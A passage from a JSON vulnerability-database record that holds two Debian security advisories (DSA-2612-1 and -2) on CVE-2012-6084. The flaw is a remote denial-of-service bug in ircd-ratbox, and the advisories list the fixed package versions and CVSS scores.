Muehlenhoff\nJanuary 24, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ircd-ratbox\nVulnerability : programming error\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-6084\n\nIt was discovered that a bug in the server capability negotiation code of\nircd-ratbox could result in denial of service.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.0.6.dfsg-2squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 3.0.7.dfsg-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.0.7.dfsg-3.\n\nWe recommend that you upgrade your ircd-ratbox packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2013-01-24T21:36:40", "published": "2013-01-24T21:36:40", "id": "DEBIAN:DSA-2612-1:DE325", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00016.html", "title": "[SECURITY] [DSA 2612-1] ircd-ratbox security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-11T13:15:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6084"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2612-2 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nFebruary 10, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ircd-ratbox\nVulnerability : programming error\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-6084\n\nThis update to the previous ircd-ratbox DSA only raises the version number\nto ensure that a higher version is used than a previously binNMU on some\narchitectures.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.0.6.dfsg-2+squeeze1.\n\nWe recommend that you upgrade your ircd-ratbox packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2013-02-10T18:37:36", "published": "2013-02-10T18:37:36", "id": "DEBIAN:DSA-2612-2:5F851", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00024.html", "title": "[SECURITY] [DSA 2612-2] ircd-ratbox update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}